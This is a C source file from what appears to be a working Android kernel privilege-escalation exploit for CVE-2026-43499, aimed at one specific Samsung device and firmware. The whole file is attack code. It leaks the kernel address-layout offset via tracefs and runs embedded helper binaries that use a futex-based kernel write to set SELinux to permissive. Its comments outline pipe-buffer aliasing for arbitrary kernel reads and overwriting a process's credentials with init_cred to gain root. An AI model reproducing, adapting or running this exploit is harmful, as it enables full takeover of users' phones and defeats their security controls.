/*
 * selinux_ghost.c -- SELinux permissive flip via embedded standalone binary
 *
 * The PI-chain ghost-write technique (from selinux_permissive.c) is
 * stack-layout sensitive: the sendmmsg iov array must alias the
 * rt_mutex_waiter that FUTEX_WAIT_REQUEUE_PI placed on thread Y's stack.
 * This aliasing only holds when the call depth matches the standalone binary
 * exactly.  Running as a preloaded .so inside an existing process changes
 * the stack layout enough that the alias breaks and the kernel walks a
 * garbage pointer, causing a panic.
 *
 * Solution: embed the stripped selinux_permissive standalone binary (built
 * from the same selinux_permissive.c, for this exact firmware) as a byte
 * array.  ghost_selinux_permissive() writes it to a tmpfs path, chmod's it,
 * and forks+execs it in a clean address space -- identical to running the
 * standalone binary directly.  The KASLR slide is passed via the
 * SLIDE_P0_OFFSET environment variable so the child skips the tracefs leak
 * (already done by the parent) and goes straight to the write.
 *
 * The embedded binary:
 *   - Built from /home/sukuna/Pictures/work/selinux_permissive.c
 *   - Target: SM-S166V (a16x), kernel 5.15.189-android13-3, S166VUDU7DZE9
 *   - Confirmed working on this device
 */

#include "common.h"

#if defined(SELINUX_GHOST_WRITE) && SELINUX_GHOST_WRITE

/* Embedded binary -- generated by:
 *   xxd -i selinux_permissive > ghost_permissive_bin.h
 * The header defines ghost_permissive_bin[] and ghost_permissive_bin_len.
 */
#include "targets/a16x-S166VUDU7DZE9/ghost_permissive_bin.h"

/*
 * The helper binary is written to a FRESH per-process path.  A fixed name
 * is fragile: a helper written during a Permissive-era run keeps a label
 * that denies shell write/stat under Enforcing, so the next run's
 * open(O_WRONLY|O_TRUNC) fails EACCES and the flip never starts
 * (observed: open errno=13 on every attempt, helper unstatable by shell).
 * A unique path is always a fresh inode with a normal shell label.
 */
static char ghost_helper_path[96];
static const char *ghost_helper_path_get(void) {
    if (ghost_helper_path[0] == '\0') {
        (void)snprintf(ghost_helper_path, sizeof(ghost_helper_path),
                       "/data/local/tmp/.cve43499_selinux_helper.%d",
                       (int)getpid());
    }
    return ghost_helper_path;
}
#define GHOST_HELPER_PATH ghost_helper_path_get()
#define GHOST_SLIDE_FILE "/data/local/tmp/.cve43499_slide"

/*
 * The embedded flip child is re-run-safe now: the parent passes a fresh
 * GHOST_FLIP_WINDOW per invocation so each run gets a fresh fake-lock
 * window group (an earlier reuse of a walked waiters tree panicked in
 * rt_mutex_top_waiter BUG_ON(w->lock != lock), observed K2608130218).
 * Persist the KASLR slide after the first successful flip so retries can
 * load it instead of re-running the child.  The slide is per-boot, so the
 * file is tagged with the kernel boot_id and only honored for the same
 * boot (stale files from a previous boot are rejected).
 */
static int ghost_boot_id(char *out, size_t out_len)
{
    int fd = open("/proc/sys/kernel/random/boot_id", O_RDONLY | O_CLOEXEC);
    if (fd < 0) {
        return -1;
    }
    ssize_t r = read(fd, out, out_len - 1);
    close(fd);
    if (r <= 0) {
        return -1;
    }
    /*
     * Strip the trailing newline: ghost_load_persisted_slide() parses the
     * boot tag with sscanf %s (which stops at whitespace), so a stored tag
     * with a trailing '\n' would never strcmp() equal -- the slide was
     * rejected as "from another boot" on EVERY load (observed: flip lands
     * on attempt 1, every later attempt re-runs the child and loses the
     * slide, so the read/write stages never get real targets).
     */
    while (r > 0 && (out[r - 1] == '\n' || out[r - 1] == '\r')) {
        r--;
    }
    out[r] = 0;
    return 0;
}

static void ghost_save_persisted_slide(uintptr_t slide)
{
    char boot[128];
    char buf[256];
    int n = 0;
    if (ghost_boot_id(boot, sizeof(boot)) == 0) {
        n = snprintf(buf, sizeof(buf), "%s 0x%lx\n", boot,
                     (unsigned long)slide);
    } else {
        n = snprintf(buf, sizeof(buf), "0x%lx\n", (unsigned long)slide);
    }
    /*
     * A stale slide file from a previous boot can carry a bad SELinux label
     * (written while Permissive, unreadable under Enforcing -- observed with
     * '?' stat on /data/local/tmp/.cve43499_slide).  Save time is right after
     * the flip (still Permissive), so unlink first to clear any broken
     * inode, then create fresh.
     */
    (void)unlink(GHOST_SLIDE_FILE);
    int fd = open(GHOST_SLIDE_FILE, O_WRONLY | O_CREAT | O_TRUNC | O_CLOEXEC,
                  0600);
    if (fd < 0) {
        pr_warning("ghost selinux: persist slide open failed errno=%d\n",
                   errno);
        return;
    }
    (void)write(fd, buf, (size_t)(n > 0 ? n : 0));
    close(fd);
}

static uintptr_t ghost_load_persisted_slide(void)
{
    char buf[512];
    int fd = open(GHOST_SLIDE_FILE, O_RDONLY | O_CLOEXEC);
    if (fd < 0) {
        return 0;
    }
    ssize_t r = read(fd, buf, sizeof(buf) - 1);
    close(fd);
    if (r <= 0) {
        return 0;
    }
    buf[r] = 0;
    char boot[128];
    unsigned long v = 0;
    if (ghost_boot_id(boot, sizeof(boot)) == 0) {
        char file_boot[128];
        if (sscanf(buf, "%127s 0x%lx", file_boot, &v) == 2) {
            if (strcmp(file_boot, boot) != 0) {
                pr_warning("ghost selinux: persisted slide is from another "
                           "boot, ignoring (clearing stale file)\n");
                (void)unlink(GHOST_SLIDE_FILE);
                return 0;
            }
            return (uintptr_t)v;
        }
        /* Old format (no boot id) -- reject to stay safe. */
        return 0;
    }
    if (sscanf(buf, "0x%lx", &v) == 1) {
        return (uintptr_t)v;
    }
    return 0;
}

static long ghost_read_enforce(void)
{
    FILE *f = fopen("/sys/fs/selinux/enforce", "r");
    long v = -1;
    if (f) {
        if (fscanf(f, "%ld", &v) != 1)
            v = -1;
        fclose(f);
    }
    return v;
}

/*
 * ghost_tracefs_kaslr() -- leak the KASLR slide via tracefs.
 * Sets kaslr_base, kaslr_slide, slide_p0_offset, kaslr_done.
 * Called by main.c BEFORE slide_leak_kernel_base() so that SLIDE_P0_OFFSET
 * is set and slide_app.c skips its pselect path (issue #160).
 */
int ghost_tracefs_kaslr(void)
{
    static const char tracing_on[]   = "/sys/kernel/tracing/tracing_on";
    static const char trace[]        = "/sys/kernel/tracing/trace";
    static const char event_enable[] =
        "/sys/kernel/tracing/events/sched/sched_blocked_reason/enable";

    int cpu_count = (int)sysconf(_SC_NPROCESSORS_ONLN);
    const uint64_t link_caller = KIMAGE_TEXT_BASE + SLIDE_TRACEFS_WORKER_CALLER_OFF;

    for (int attempt = 0; attempt < SLIDE_MAX_ATTEMPTS; attempt++) {
        int fd;
        fd = open(tracing_on,   O_WRONLY | O_CLOEXEC);
        if (fd >= 0) { write(fd, "0", 1); close(fd); }
        fd = open(event_enable, O_WRONLY | O_CLOEXEC);
        if (fd >= 0) { write(fd, "1", 1); close(fd); }
        fd = open(trace,        O_WRONLY | O_TRUNC | O_CLOEXEC);
        if (fd >= 0) close(fd);
        fd = open(tracing_on,   O_WRONLY | O_CLOEXEC);
        if (fd >= 0) { write(fd, "1", 1); close(fd); }

        sleep(1);

        /*
         * Drain with tracing LEFT ON and a blocking reader, exactly like
         * the proven selinux_permissive.c kaslr_try: on this kernel,
         * disabling tracing before reading freezes the per-CPU ring
         * buffers and trace_pipe_raw returns nothing.
         */
        uintptr_t candidate = 0;
        int found = 0;

        for (int cpu = 0; cpu < cpu_count && !found; cpu++) {
            char path[128];
            snprintf(path, sizeof(path),
                     "/sys/kernel/tracing/per_cpu/cpu%d/trace_pipe_raw", cpu);

            int pfd[2];
            if (pipe(pfd) < 0) continue;

            pid_t child = fork();
            if (child == 0) {
                close(pfd[0]);
                int rfd = open(path, O_RDONLY | O_CLOEXEC);
                if (rfd >= 0) {
                    unsigned char tbuf[4096];
                    ssize_t n;
                    while ((n = read(rfd, tbuf, sizeof(tbuf))) > 0)
                        write(pfd[1], tbuf, (size_t)n);
                    close(rfd);
                }
                close(pfd[1]);
                _exit(0);
            }
            close(pfd[1]);

            size_t bufsz = 524288;
            unsigned char *buf = malloc(bufsz);
            ssize_t total = 0;
            while ((size_t)total < bufsz) {
                fd_set rfds;
                struct timeval tv = { .tv_sec = 3, .tv_usec = 0 }; /* 3s */
                FD_ZERO(&rfds);
                FD_SET(pfd[0], &rfds);
                if (select(pfd[0] + 1, &rfds, NULL, NULL, &tv) <= 0) break;
                ssize_t got = read(pfd[0], buf + total, bufsz - (size_t)total);
                if (got <= 0) break;
                total += got;
            }
            kill(child, SIGTERM);
            waitpid(child, NULL, 0);
            close(pfd[0]);

            for (ssize_t off = 0; off < total && !found;) {
                size_t remain = (size_t)(total - off);
                if (remain < 20) break;
                uint64_t commit = 0;
                memcpy(&commit, buf + off + 8, sizeof(commit));
                size_t data_len = (size_t)(commit & 0xfffULL);
                size_t page_end = (size_t)off + 16 + data_len;
                if (page_end > (size_t)total) page_end = (size_t)total;
                for (size_t pos = (size_t)off + 16; pos + 4 <= page_end;) {
                    uint32_t hd = 0;
                    memcpy(&hd, buf + pos, sizeof(hd));
                    uint32_t t = hd & 0x1fU;
                    if (t == 30) { pos += 8; continue; }
                    if (t == 31) { pos += 12; continue; }
                    if (t == 0 || t >= 29) break;
                    size_t rec_len = (size_t)t * 4;
                    size_t rec = pos + 4;
                    if (rec + rec_len > page_end) break;
                    uint16_t eid = 0;
                    memcpy(&eid, buf + rec, sizeof(eid));
                    if (eid == SLIDE_TRACEFS_EVENT_ID && rec_len >= 24) {
                        uint64_t caller = 0;
                        memcpy(&caller, buf + rec + 16, sizeof(caller));
                        if (caller >= link_caller) {
                            uint64_t slide = caller - link_caller;
                            if (slide <= SLIDE_MAX_CANDIDATE &&
                                (slide & 0xffffULL) == 0) {
                                candidate = (uintptr_t)slide;
                                found = 1;
                                pr_success("ghost tracefs caller=%016llx "
                                           "slide=%08llx attempt=%d\n",
                                           (unsigned long long)caller,
                                           (unsigned long long)slide,
                                           attempt + 1);
                                break;
                            }
                        }
                    }
                    pos = rec + rec_len;
                }
                off = (ssize_t)((page_end + 15) & ~(size_t)15);
            }
            free(buf);
        }

        fd = open(event_enable, O_WRONLY | O_CLOEXEC);
        if (fd >= 0) { write(fd, "0", 1); close(fd); }
        fd = open(tracing_on, O_WRONLY | O_CLOEXEC);
        if (fd >= 0) { write(fd, "0", 1); close(fd); }

        if (found) {
            slide_p0_offset = candidate;
            kaslr_base      = KIMAGE_TEXT_BASE + candidate;
            kaslr_slide     = candidate;
            kaslr_done      = 1;
            pr_success("ghost tracefs kaslr base=0x%llx slide=0x%llx\n",
                       (unsigned long long)kaslr_base,
                       (unsigned long long)kaslr_slide);
            return 1;
        }
        /* pr_warning, not pr_error: a miss is retryable and pr_error exits(-1). */
        pr_warning("ghost tracefs: worker caller not found (%d/%d)\n",
                   attempt + 1, SLIDE_MAX_ATTEMPTS);
    }
    return 0;
}

/* Embedded ghost_write_helper binary (12KB stripped dynamic ELF).
 * Reads GHOST_WRITE_TARGET and GHOST_WRITE_VALUE env vars,
 * runs the PI-chain ghost write, exits 0 on success. */
#include "targets/a16x-S166VUDU7DZE9/ghost_write_helper_bin.h"

#define GHOST_WRITE_HELPER_PATH "/data/local/tmp/.cve43499_write_helper"

/*
 * ghost_write_once() -- write `value` to `target` using the embedded
 * ghost_write_helper binary.  Runs in a fresh forked+exec'd process so
 * the PI-chain stack aliasing is clean.
 * Returns 0 on success, -1 on failure.
 */
/*
 * Rotating fake-lock2 window index.  Each ghost write leaves the fake
 * lock's waiters tree in a walked/modified state; reusing the same window
 * makes the next PI-chain walk chase corrupt waiter links (observed panic:
 * rt_mutex_adjust_prio_chain in the second consecutive write).  The
 * standalone selinux_permissive.c rotates windows in-process; the helper is
 * one-write-per-process, so the PARENT must rotate across calls via the
 * GHOST_WRITE_WINDOW env var.
 *
 * The helper consumes one WINDOW for the settle lock plus one fresh WINDOW
 * per write, all drawn from fake_lock2_windows[] in the helper (1024
 * windows).  The parent passes the starting WINDOW index via
 * GHOST_WRITE_WINDOW and must advance by n+1 after a batch of n writes.
 *
 * The counter is per-process, so a retry (fresh attempt process) would
 * restart at window 0 and REUSE the exact fake-lock tree the previous
 * attempt's writes already walked -> rt_mutex_adjust_prio_chain panic
 * (observed K2608130429: attempt-2 write helper crashed at +0x218 with
 * x24/x27 == k_fake_lock, the helper's own documented reused-tree crash).
 * The supervisor passes GHOST_WRITE_WINDOW_BASE (the attempt index) and we
 * seed the counter so every attempt starts on a fresh window region.
 */
#define GHOST_WRITE_WINDOWS 1024  /* == fake_lock2_windows[] entries in the helper */
static unsigned int ghost_write_window = 0;
static int ghost_write_window_seeded = 0;

/* Seed the per-process window counter from the attempt-scoped base so a
 * retry never reuses a fake-lock window a previous attempt already walked.
 * One attempt can consume ~96 windows (hardening batch + slot probes +
 * reads + cred writes), but the in-process mm-leak retry re-runs up to 16
 * slot probes per attempt: worst case is harden(13) + 3x discovery(96) +
 * UMH byte writes(~51) ~= 160 (GHOST_DIAG adds ~16), so give each attempt a
 * 192-window region (5 regions over the 1024-window helper table). */
#define GHOST_WRITE_WINDOW_STRIDE 192
static void ghost_seed_write_window(void)
{
    if (ghost_write_window_seeded) {
        return;
    }
    ghost_write_window_seeded = 1;
    const char *base_env = getenv("GHOST_WRITE_WINDOW_BASE");
    if (base_env && *base_env) {
        char *end = NULL;
        unsigned long base = strtoul(base_env, &end, 10);
        if (end != base_env && !*end) {
            ghost_write_window = (unsigned int)(base * GHOST_WRITE_WINDOW_STRIDE) %
                                 GHOST_WRITE_WINDOWS;
            pr_info("ghost root: write window base=%lu counter=%u\n",
                    base, ghost_write_window);
        }
    }
}

struct ghost_wr { uintptr_t target, value; };

/*
 * ghost_write_batch() -- run `n` ghost writes in ONE helper exec with
 * in-process fake-lock window rotation (the proven selinux_permissive.c
 * architecture).  Per-write execs re-arm the ghost topology every time,
 * which multiplies the heap-spray UAF chain-walk risk (hardlockup ~5% per
 * exec observed); batching drops the exec count from ~50 to ~10 per run.
 * The helper reads the pairs from a fresh per-pid list file.
 * Returns 0 on success, -1 on failure.
 */
static int ghost_write_batch(const struct ghost_wr *writes, size_t n)
{
    if (n == 0) {
        return 0;
    }
    ghost_seed_write_window();

    /* Write the helper binary. */
    int fd = open(GHOST_WRITE_HELPER_PATH,
                  O_WRONLY | O_CREAT | O_TRUNC | O_CLOEXEC, 0755);
    if (fd < 0) {
        pr_error("ghost_write_batch: open helper failed errno=%d\n", errno);
        return -1;
    }
    const unsigned char *p = ghost_write_helper_bin;
    size_t rem = ghost_write_helper_bin_len;
    while (rem > 0) {
        ssize_t wrote = write(fd, p, rem);
        if (wrote <= 0) {
            close(fd);
            unlink(GHOST_WRITE_HELPER_PATH);
            return -1;
        }
        p += wrote; rem -= (size_t)wrote;
    }
    close(fd);

    /* Write the pair list to a fresh per-pid path (fresh label). */
    char list_path[96];
    (void)snprintf(list_path, sizeof(list_path),
                   "/data/local/tmp/.cve43499_wlist.%d", (int)getpid());
    fd = open(list_path, O_WRONLY | O_CREAT | O_TRUNC | O_CLOEXEC, 0600);
    if (fd < 0) {
        pr_error("ghost_write_batch: open list failed errno=%d\n", errno);
        unlink(GHOST_WRITE_HELPER_PATH);
        return -1;
    }
    char line[80];
    for (size_t i = 0; i < n; i++) {
        (void)snprintf(line, sizeof(line), "0x%lx 0x%lx\n",
                       (unsigned long)writes[i].target,
                       (unsigned long)writes[i].value);
        ssize_t w = write(fd, line, strlen(line));
        if (w <= 0) {
            close(fd);
            unlink(list_path);
            unlink(GHOST_WRITE_HELPER_PATH);
            return -1;
        }
    }
    close(fd);

    /* Allocate n+1 windows for this batch: one settle + one per write. */
    char wnd_env[32];
    unsigned int wnd = ghost_write_window;
    ghost_write_window = (unsigned int)((ghost_write_window + n + 1) %
                                        GHOST_WRITE_WINDOWS);
    (void)snprintf(wnd_env, sizeof(wnd_env), "GHOST_WRITE_WINDOW=%u", wnd);

    char list_env[128], slide_env[64];
    (void)snprintf(list_env, sizeof(list_env), "GHOST_WRITE_LIST=%s",
                   list_path);
    char *argv[] = { GHOST_WRITE_HELPER_PATH, NULL };
    char *envp[8];
    size_t envp_count = 0;
    envp[envp_count++] = list_env;
    envp[envp_count++] = wnd_env;
    if (kaslr_slide != 0) {
        (void)snprintf(slide_env, sizeof(slide_env),
                       "SLIDE_P0_OFFSET=0x%llx",
                       (unsigned long long)kaslr_slide);
        envp[envp_count++] = slide_env;
    }
    envp[envp_count] = NULL;

    pr_info("ghost_write_batch: n=%zu wnd=%u\n", n, wnd);

    /* Reset CPU affinity to all cores (inherited single-core pin). */
    cpu_set_t all_cpus;
    CPU_ZERO(&all_cpus);
    int ncpus = (int)sysconf(_SC_NPROCESSORS_ONLN);
    for (int i = 0; i < ncpus; i++) CPU_SET(i, &all_cpus);
    sched_setaffinity(0, sizeof(all_cpus), &all_cpus);

    pid_t child = fork();
    if (child < 0) {
        pr_error("ghost_write_batch: fork failed errno=%d\n", errno);
        unlink(list_path);
        unlink(GHOST_WRITE_HELPER_PATH);
        return -1;
    }
    if (child == 0) {
        cpu_set_t cpus;
        CPU_ZERO(&cpus);
        int nc = (int)sysconf(_SC_NPROCESSORS_ONLN);
        for (int i = 0; i < nc; i++) CPU_SET(i, &cpus);
        sched_setaffinity(0, sizeof(cpus), &cpus);
        unsetenv("LD_PRELOAD");
        execve(GHOST_WRITE_HELPER_PATH, argv, envp);
        _exit(127);
    }

    int status = 0;
    pid_t w;
    do { w = waitpid(child, &status, 0); } while (w < 0 && errno == EINTR);
    unlink(list_path);
    unlink(GHOST_WRITE_HELPER_PATH);

    if (w < 0 || !WIFEXITED(status) || WEXITSTATUS(status) != 0) {
        pr_error("ghost_write_batch: helper failed status=0x%x\n",
                 (unsigned)status);
        return -1;
    }
    pr_success("ghost_write_batch: done n=%zu\n", n);
    return 0;
}

/* Keep single-write mode for the read path (interleaved pipe reads). */
int ghost_write_once(uintptr_t target, uintptr_t value)
{
    struct ghost_wr w = { target, value };
    return ghost_write_batch(&w, 1);
}



/*
 * ghost_selinux_permissive() -- write the embedded selinux_permissive binary
 * to a temp path and exec it in a forked child.  The child runs in a clean
 * address space with the exact stack layout the exploit requires.
 *
 * The KASLR slide was already determined by slide_leak_kernel_base().
 * Pass it to the child via SLIDE_P0_OFFSET so it skips the tracefs leak.
 *
 * Returns 0 on success, -1 on failure.
 */
int ghost_selinux_permissive(void)
{
    if (!kaslr_done || !kaslr_base) {
        pr_error("ghost selinux: KASLR not resolved\n");
        return -1;
    }

    long before = ghost_read_enforce();
    if (before == 0 && kaslr_slide != 0) {
        pr_success("ghost selinux: already permissive (slide known)\n");
        return 0;
    }
    if (before == 0) {
        /*
         * Already permissive but the real slide is unknown (e.g. a retry
         * after a prior flip, or ghost mode placeholder).  First try the
         * persisted slide from an earlier successful flip THIS BOOT -- the
         * embedded child must run at most once per boot, because each run
         * walks the same fake-lock window and a second run panics
         * (rt_mutex_top_waiter BUG_ON, observed K2608130218).
         */
        uintptr_t persisted = ghost_load_persisted_slide();
        if (persisted != 0 && persisted <= SLIDE_MAX_CANDIDATE) {
            kaslr_slide = persisted;
            kaslr_base = KIMAGE_TEXT_BASE + persisted;
            kaslr_done = 1;
            pr_success("ghost selinux: already permissive, loaded persisted "
                       "slide=0x%lx (child not re-run)\n",
                       (unsigned long)persisted);
            return 0;
        }
        pr_warning("ghost selinux: already permissive and no persisted slide "
                   "(file errno=%d), re-running child (last resort)\n", errno);
    }

    pr_info("ghost selinux: writing helper binary to %s\n",
            GHOST_HELPER_PATH);

    /* Write the embedded binary to a tmpfs path. */
    int fd = open(GHOST_HELPER_PATH,
                  O_WRONLY | O_CREAT | O_TRUNC | O_CLOEXEC, 0700);
    if (fd < 0) {
        pr_error("ghost selinux: open(%s) failed errno=%d\n",
                 GHOST_HELPER_PATH, errno);
        return -1;
    }

    const unsigned char *p = ghost_permissive_bin;
    size_t rem = ghost_permissive_bin_len;
    while (rem > 0) {
        ssize_t wrote = write(fd, p, rem);
        if (wrote <= 0) {
            pr_error("ghost selinux: write failed errno=%d\n", errno);
            close(fd);
            unlink(GHOST_HELPER_PATH);
            return -1;
        }
        p += wrote;
        rem -= (size_t)wrote;
    }
    close(fd);

    /* chmod +x */
    if (chmod(GHOST_HELPER_PATH, 0755) != 0) {
        pr_error("ghost selinux: chmod failed errno=%d\n", errno);
        unlink(GHOST_HELPER_PATH);
        return -1;
    }

    /*
     * The child re-runs the tracefs KASLR leak itself (1 second).
     * selinux_permissive.c has no env var for forced slide.
     */
    pr_info("ghost selinux: exec child %s kaslr_base=0x%llx (child will re-leak)\n",
            GHOST_HELPER_PATH,
            (unsigned long long)kaslr_base);

    /*
     * Capture the child's stdout so we can parse the real KASLR slide out of
     * its "KASLR: base=... slide=..." line.  The ghost mode runs with the
     * placeholder kaslr_base==KIMAGE_TEXT_BASE, but the root installer needs
     * the true slide to compute INIT_TASK/INIT_CRED/EMPTY_ZERO_PAGE.
     */
    int out_pipe[2];
    if (pipe(out_pipe) != 0) {
        pr_error("ghost selinux: pipe failed errno=%d\n", errno);
        unlink(GHOST_HELPER_PATH);
        return -1;
    }

    pid_t child = fork();
    if (child < 0) {
        pr_error("ghost selinux: fork failed errno=%d\n", errno);
        close(out_pipe[0]);
        close(out_pipe[1]);
        unlink(GHOST_HELPER_PATH);
        return -1;
    }

    /*
     * Re-run safety: the flip child must never reuse a walked fake-lock
     * window, so each invocation gets a fresh 3-window group via
     * GHOST_FLIP_WINDOW (observed K2608130218: attempt 2 re-ran the child
     * with the same windows and panicked in rt_mutex_top_waiter).  Pair 0
     * reproduces the proven original layout, so first-run behavior is
     * unchanged.
     */
    /*
     * Fresh fake-lock window group per flip INVOCATION.  The static counter
     * is per-process, so the supervisor ALSO passes GHOST_FLIP_WINDOW_BASE
     * (the attempt index) -- a fresh process per attempt would otherwise
     * restart at window 0 and reuse the window the previous attempt already
     * walked (observed rt_mutex_adjust_prio_chain panic, K2608130412).
     */
    static unsigned int ghost_flip_windows = 0;
    const char *flip_base_env = getenv("GHOST_FLIP_WINDOW_BASE");
    if (flip_base_env && *flip_base_env && ghost_flip_windows == 0) {
        char *end = NULL;
        unsigned long base = strtoul(flip_base_env, &end, 10);
        if (end != flip_base_env && !*end) {
            ghost_flip_windows = (unsigned int)base;
        }
    }
    char flip_wnd_env[32];
    snprintf(flip_wnd_env, sizeof(flip_wnd_env), "GHOST_FLIP_WINDOW=%u",
             ghost_flip_windows++ & 0xff);

    if (child == 0) {
        /*
         * Child: exec the proven standalone binary.
         * Critical: the parent is pinned to CORE 0 via sched_setaffinity.
         * After fork() the child inherits this single-CPU mask, which
         * prevents the three-thread PI topology (main+Y+X) from ever
         * settling -- all three threads fight for one core.
         * Reset affinity to all CPUs before exec so the binary runs
         * identically to being invoked from a fresh adb shell.
         */
        cpu_set_t all_cpus;
        CPU_ZERO(&all_cpus);
        int ncpus = (int)sysconf(_SC_NPROCESSORS_ONLN);
        for (int i = 0; i < ncpus; i++)
            CPU_SET(i, &all_cpus);
        sched_setaffinity(0, sizeof(all_cpus), &all_cpus);

        /* Also clear LD_PRELOAD in case it's still set. */
        unsetenv("LD_PRELOAD");
        setenv("GHOST_FLIP_WINDOW", flip_wnd_env + 18, 1);
        /*
         * If the parent happens to know the slide (a prior flip this boot),
         * force it so the child skips its own tracefs leak: the re-leak is
         * slow and can resolve a DIFFERENT base, which walks the fake-lock
         * region at the wrong address (crash class seen in ghost16's
         * attempt-2 flip re-run).  The child now honors SLIDE_P0_OFFSET.
         */
        if (kaslr_slide != 0) {
            char slide_env[40];
            snprintf(slide_env, sizeof(slide_env), "SLIDE_P0_OFFSET=0x%llx",
                     (unsigned long long)kaslr_slide);
            putenv(slide_env);
        }
        dup2(out_pipe[1], STDOUT_FILENO);
        close(out_pipe[0]);
        close(out_pipe[1]);

        char *argv[] = { GHOST_HELPER_PATH, NULL };
        execv(GHOST_HELPER_PATH, argv);
        _exit(127);
    }
    close(out_pipe[1]);

    /* Parent: drain the child's stdout (blocks until EOF, i.e. child exit). */
    int status = 0;
    pid_t waited;
    unsigned char child_out[65536];
    size_t child_out_len = 0;
    for (;;) {
        ssize_t r = read(out_pipe[0], child_out + child_out_len,
                         sizeof(child_out) - child_out_len);
        if (r > 0) {
            child_out_len += (size_t)r;
            if (child_out_len >= sizeof(child_out)) {
                break;
            }
            continue;
        }
        if (r < 0 && errno == EINTR) {
            continue;
        }
        break;  /* 0 == EOF or hard error */
    }
    close(out_pipe[0]);
    do {
        waited = waitpid(child, &status, 0);
    } while (waited < 0 && errno == EINTR);

    /*
     * Parse the "KASLR: base=0x... slide=0x..." line from the captured
     * output.  The child's slide is authoritative: when it exits 0 the
     * flip landed with exactly that base.  Do NOT impose a 64KB-alignment
     * check -- slides vary per boot (observed 0xb8000/0xe8000/0x130000/
     * 0x1d8000) and are not always 64KB-aligned.
     */
    uint64_t parsed_slide = 0;
    uint64_t parsed_base = 0;
    int parsed_ok = 0;
    if (child_out_len > 0) {
        child_out[child_out_len < sizeof(child_out)
                      ? child_out_len
                      : sizeof(child_out) - 1] = 0;
        /* Dump raw child output for debugging. */
        int dbg_fd = open("/data/local/tmp/cve-ghost-child.log",
                          O_WRONLY | O_CREAT | O_TRUNC | O_CLOEXEC, 0644);
        if (dbg_fd >= 0) {
            (void)write(dbg_fd, child_out, child_out_len);
            close(dbg_fd);
        }
        const char *mark = strstr((const char *)child_out, "KASLR: base=0x");
        if (mark) {
            parsed_ok = (sscanf(mark, "KASLR: base=0x%llx slide=0x%llx",
                                (unsigned long long *)&parsed_base,
                                (unsigned long long *)&parsed_slide) == 2);
        }
    }
    if (parsed_ok && parsed_slide <= SLIDE_MAX_CANDIDATE &&
        parsed_base == KIMAGE_TEXT_BASE + parsed_slide) {
        kaslr_slide = (uintptr_t)parsed_slide;
        kaslr_base = KIMAGE_TEXT_BASE + kaslr_slide;
        kaslr_done = 1;
        ghost_save_persisted_slide(kaslr_slide);
        pr_success("ghost selinux: child slide=0x%llx base=0x%llx "
                   "(persisted)\n",
                   (unsigned long long)kaslr_slide,
                   (unsigned long long)kaslr_base);
    } else {
        pr_warning("ghost selinux: implausible child KASLR line "
                   "(ok=%d slide=0x%llx base=0x%llx len=%zu)\n",
                   parsed_ok, (unsigned long long)parsed_slide,
                   (unsigned long long)parsed_base, child_out_len);
    }

    unlink(GHOST_HELPER_PATH);

    if (waited < 0) {
        pr_error("ghost selinux: waitpid failed errno=%d\n", errno);
        return -1;
    }
    if (!WIFEXITED(status)) {
        pr_error("ghost selinux: child killed by signal %d\n",
                 WTERMSIG(status));
        return -1;
    }
    if (WEXITSTATUS(status) != 0) {
        pr_error("ghost selinux: child exited %d\n",
                 WEXITSTATUS(status));
        return -1;
    }

    long after = ghost_read_enforce();
    if (after == 0) {
        pr_success("ghost selinux: permissive (enforce=%ld)\n", after);
        return 0;
    }
    pr_error("ghost selinux: child succeeded but enforce=%ld\n", after);
    return -1;
}

/* ========================================================================== */
/*  GHOST CRED ROOT -- uid-0 via &init_cred and a ghost-forged pipe alias     */
/* ========================================================================== */
/*
 * The ghost write can only carry values that sit at writable kernel
 * addresses: rb_erase() writes the parent pointer into value+0, so an ASCII
 * string or a text/function-pointer value faults (the earlier modprobe_path
 * attempt panicked exactly there).  That rules out every classic write-only
 * root on this kernel: modprobe_path, fake-fops/configfs, workqueue-UMH.
 *
 * This path roots a process directly with a small number of extra ghost
 * writes after the selinux flip:
 *
 *   1. prepare_pipe_buffer_page() recovers the reclaimed slab page holding
 *      the reclaim pipes' pipe_buffer arrays (the KernelSnitch "mm leak",
 *      pure userspace, verified working on this device).
 *   2. Ghost-writing a pipe_buffer's `page` field (a struct page* -- the
 *      vmemmap is writable) aliases that pipe to an arbitrary kernel page:
 *      pipe_read() then returns the kernel page's contents (arbitrary
 *      kernel read).  ops/offset/len are left from a normal full-page
 *      write, and reads stop one byte short of consumption so the kernel
 *      page is never put_page()'d.
 *   3. The slot->pipe mapping is learned once by probing each of the 16
 *      object slots with empty_zero_page (a guaranteed all-zero page).
 *   4. A "ll_root_child" is forked, its task_struct is located by walking
 *      the task list backward from init_task.tasks.prev, and its
 *      real_cred/cred are ghost-written to &init_cred (writable .data).
 *      init_cred's first qword is scribbled by the write itself, so the
 *      child calls setgid(0)/setuid(0) -- init_cred carries full caps --
 *      and then execs the su daemon.
 */
#define GHOST_ROOT_CHILD_COMM  "ll_root_child"
#define GHOST_PIPE_ARM_LEN     4096
#define GHOST_PIPE_MAX_SLOTS   16          /* PIPE_OBJS_PER_SLAB */
#define GHOST_PIPE_MAX_MAPPED  4           /* the UMH channel needs ONE pipe; fewer slot probes = fewer fake-lock windows = further from the rt_mutex hang threshold */
#define GHOST_PIPE_MAX_WALK    12
#define GHOST_MM_RETRY         12          /* in-process mm-leak attempts */
/*
 * The kmalloc-rcl-2k cache that holds both the leaked mm_struct and the
 * reclaim pipes' pipe_buffer arrays lives in HIGH DRAM (~33-35 GB phys) on
 * this device.  The KernelSnitch leak occasionally returns a candidate in
 * LOW DRAM (< 4 GB phys) instead; every low-DRAM base but one has mapped
 * zero pipes across many boots (the low region is shared with heavy kernel
 * allocation traffic that steals the reclaimed order-3 slab), while
 * high-DRAM bases map reliably.  Re-leak on a low base before spending the
 * arm + keeper + harden + 16-probe ghost execs on it.
 */
#define GHOST_PIPE_BASE_MIN    (DIRECT_MAP_BASE + (4ULL << 30))
#define GHOST_ROOT_HELPER      "/data/local/tmp/cve-2026-43499-root"

static uintptr_t ghost_pipe_base;                    /* pipebuf_page_base */
static int ghost_slot_to_pipe[GHOST_PIPE_MAX_SLOTS]; /* slot -> pipe or -1 */
static int ghost_pipe_slot[PIPE_RECLAIM];            /* pipe -> slot or -1 */
static int ghost_pipe_consumed[PIPE_RECLAIM];        /* bytes already read */
static int ghost_mapped_pipes[GHOST_PIPE_MAX_SLOTS];
static int ghost_mapped_count;
static int ghost_next_read_pipe_idx;
static int ghost_last_consumed;                      /* consumed at last read */

/* Forward decls (defined near ghost_install_root_cred). */
static int ghost_pin_region(uintptr_t forge_page, int below, int above,
                            struct ghost_wr *wr, int max);
static void ghost_pin_mark(const struct ghost_wr *wr, int n);
